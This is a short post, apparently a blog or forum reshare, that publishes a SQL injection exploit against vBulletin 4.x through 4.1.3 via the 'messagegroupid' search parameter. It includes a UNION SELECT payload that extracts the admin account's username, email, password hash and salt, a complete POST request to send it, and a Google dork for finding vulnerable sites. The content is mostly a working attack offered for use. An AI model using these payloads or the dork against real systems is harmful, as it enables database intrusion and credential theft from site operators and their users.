So… after the patching done 2 months ago by vBulletin team here it is:

Vulnerability:
Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection Vulnerability in parameter “&messagegroupid” due to improper input validation.

Exploitation:
Post data on: –>search.php?search_type=1
–> Search Single Content Type
Keywords : Valid Group Message
Search Type : Group Messages
Search in Group : Valid Group Id

[cc lang=”html”]&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#[/cc]
Exact request:

Exact Request as follows:

Code:
[cc lang=”html”]query=Cross+Domain+Content+Extraction+attacks&titleonly=0&searchuser=&starteronly=0&searchdate=0&beforeafter=after&sortby=dateline&order=descending&showposts=1&saveprefs=1&dosearch=Search+Now&s=&securitytoken=1311201469-a9ee9dd6adccba0f8758fce3f02b7e0a267eea75&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#[/cc]

Google dork: intitle: powered by Vbulletin 4
Author: FB1H2S
Found his blog. Awesome posts.